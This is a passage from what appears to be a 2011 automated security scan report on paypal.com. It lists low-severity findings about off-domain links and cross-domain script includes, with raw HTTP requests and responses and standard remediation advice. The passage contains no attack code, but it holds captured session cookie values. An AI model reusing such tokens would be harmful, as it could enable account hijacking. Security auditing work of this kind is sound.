Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 14:58:20 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_flow%20b%2016%20_sitewide-search%20c%206%20webscr%20d%209%20searchscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2038%20xpt%2fMerchant%2fonboarding%2fGettingStarted%20j%2042%20xpt%2fCustomer%2fgeneral%2fSearchResultsRedesign%20k%2039%20Sign%20up%20for%20a%20Business%20account%20-%20PayPal%20l%2023%20Search%20Results%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Cache-Control: must-revalidate, proxy-revalidate, no-cache
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 28999

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/global.css">

<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/print.css"><style type="text/css">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"></head>
...[SNIP]...
<span><img alt="" border="0" height="1" width="45" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" class="grayline"></span><span><img alt="" border="0" width="5" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" height="1"></span>
...[SNIP]...
<span><img alt="" border="0" width="5" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" height="1"></span><span><img alt="" border="0" height="1" width="45" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" class="grayline"></span>
...[SNIP]...
</select><img src="https://www.paypalobjects.com/en_US/i/icon/icon_US_22x14.gif" border="0" class="flag" alt=""></span>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/onlineOpinionPopup.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/Merchant/js/flowGettingStarted.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.28. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/webscr?cmd=_web-referrals-mrb-outside

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/bnr/paypal_mrb_banner.gif
https://www.paypalobjects.com/en_US/i/header/hdr_mrb_earn_177x100.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/en_US/i/scr/pixel.gif
https://www.x.com/

Request

GET /us/cgi-bin/webscr?cmd=_web-referrals-mrb-outside HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help
Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=cEEifxQAcWhGlglOcVqTXHnflUU31cXJ9zmpTH-bkMZ63y3KWwyWm1S_wthfujnPpyu2W4STSi-gmhCVUo64KaVXQQILqRDSucSQbYL1pWAfqJVdDOJtz7jsJDIQPGitDlZlIm%7cKCcYeNx26ncV9woIxidLpWBlvM2P-apdRSZFl3m_LbX2WQwmWH-z-dsLYusl_O-ES5k0i0%7cmtijiXZuPSV3kyj6Q94Y4zdws77PbwG-L8-dHyJkdT_oZI_fZpfuPH5mj4WOkYpeUDQWgG%7c1313114298; KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; navcmd=_help; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D0%3B%20tr_p1%3D_help%253A%253A_help%3B%20v31%3D_help%253A%253A_help%3B%20SC_LINKS%3D_help%253A%253A_help%255E%255EReferrals%255E%255E_help%253A%253A_help%2520%257C%2520Referrals%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253D_help%2525253A%2525253A_help%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.paypal.com%2525252Fus%2525252Fcgi-bin%2525252Fwebscr%2525253Fcmd%2525253D_web-referrals-mrb-outside%252526ot%25253DA%3B; s_pers=%20gpv_c43%3D_help%253A%253A_help%7C1313116195057%3B%20gpv_events%3Dno%2520value%7C1313116196334%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:15 GMT
Server: Apache
Set-Cookie: navcmd=_web-referrals-mrb-outside; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 01:59:16 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2026%20_web-referrals-mrb-outside%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2051%20xpt%2fMarketing_CommandDriven%2fmerchant%2fMRBFAQ-outside%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2040%20Merchant%20Referral%20Bonus%20Program%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 16581

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css">

<link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...
<td><img alt="" border="0" height="2" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
...[SNIP]...
<td><img alt="" border="0" height="4" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
...[SNIP]...
<div id="xptContentMain"><img align="left" border="0" src="https://www.paypalobjects.com/en_US/i/header/hdr_mrb_earn_177x100.gif" alt="Image FPO"><span class="emphasis">
...[SNIP]...
<a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_web-referrals-mrb"><img src="https://www.paypalobjects.com/en_US/i/bnr/paypal_mrb_banner.gif" border="0" alt="Sign up for PayPal and start accepting credit card payments instantly."></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.29. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/webscr?cmd=_home

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/js/tns/min/bid.js
https://www.x.com/

Request

GET /us/cgi-bin/webscr?cmd=_home HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:47:27 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=qfL6Am0KfL1hh1oV__m3JHGER4q70E8XARLU5bi3P_yeLJsbn8sy-oS6fxLboLlD0cf2uBfniBTOnrszb5GdBCq686d7fOeLto2evxLtPe2X7YCa7F5W7B5B78P2T4n6RJkghG%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156848; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:47:28 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_home%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fMarketing_CommandDriven%2fhomepage%2fMainHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2063%20Send%20Money%2c%20Pay%20Online%20or%20Set%20Up%20a%20Merchant%20Account%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="all" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css">

<link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"></head>
...[SNIP]...
f=https://www.paypal.com/us/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49775&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUw><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg' border='0' alt=''/></a>
...[SNIP]...
</div><img src="https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif" border="0" class="dottedline" alt=""><p class="acceptCredit">
...[SNIP]...
f=https://www.paypal.com/us/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49777&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUQ><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif' border='0' alt=''/></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.30. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-run&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/global.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/print.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/flows/flowHFR.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/pages/pageLogin.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/icon/secure_lock_2.gif
https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/js/tns/min/bid.js
https://www.x.com/

Request

GET /us/cgi-bin/webscr?cmd=_login-run&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75 HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:09 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_login-run; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:10 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2010%20_login-run%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2011%20p%2fgen%2flogin%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2014%20Login%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18881

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/global.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/pages/pageLogin.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/flows/flowHFR.css">

<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/print.css"><style type="text/css">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"></head>
...[SNIP]...
</span> <img src="https://www.paypalobjects.com/en_US/i/icon/secure_lock_2.gif" border="0" alt=""></div>
...[SNIP]...
<a href=https://www.paypal.com/us/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49773&bn=HQsPRgpZ&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFV3E><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg' border='0' alt=''/></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

8. Cross-domain script include previous next
There are 30 instances of this issue:

/
/ca/cgi-bin/webscr
/ca/cgi-bin/webscr
/cgi-bin/helpscr
/cgi-bin/helpscr
/cgi-bin/helpweb
/cgi-bin/helpweb
/cgi-bin/marketingweb
/cgi-bin/searchscr
/cgi-bin/webscr
/cgi-bin/webscr
/express-checkout-buttons
/helpcenter/main.jsp
/helpcenter/main.jsp
/us/cgi-bin/
/us/cgi-bin/
/us/cgi-bin/helpscr
/us/cgi-bin/helpscr
/us/cgi-bin/helpweb
/us/cgi-bin/helpweb
/us/cgi-bin/marketingweb
/us/cgi-bin/marketingweb
/us/cgi-bin/searchscr
/us/cgi-bin/webscr
/us/cgi-bin/webscr
/us/cgi-bin/webscr
/us/ewf/f=pps_spf
/us/ewf/f=sa_unauth
/webapps/mpp/merchant
/webapps/mpp/website-payments-pro

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

8.1. https://www.paypal.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:22:25 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=jdB7YmFJdBAmYatfkLa_e_MUwkzUwN2becl4foK9XdxpaoFcwr7k4yeggSnz1xXeqJgyxfcJ_32kQjtKNmfr2MNA_gkMTN8BzaKM8GIueGWrF1lCa4GDXCBI3PcLnQ_cbS93f0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112146; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; expires=Thu, 07-Aug-2031 01:22:26 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_check=yes; expires=Mon, 09-Aug-2021 01:22:26 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
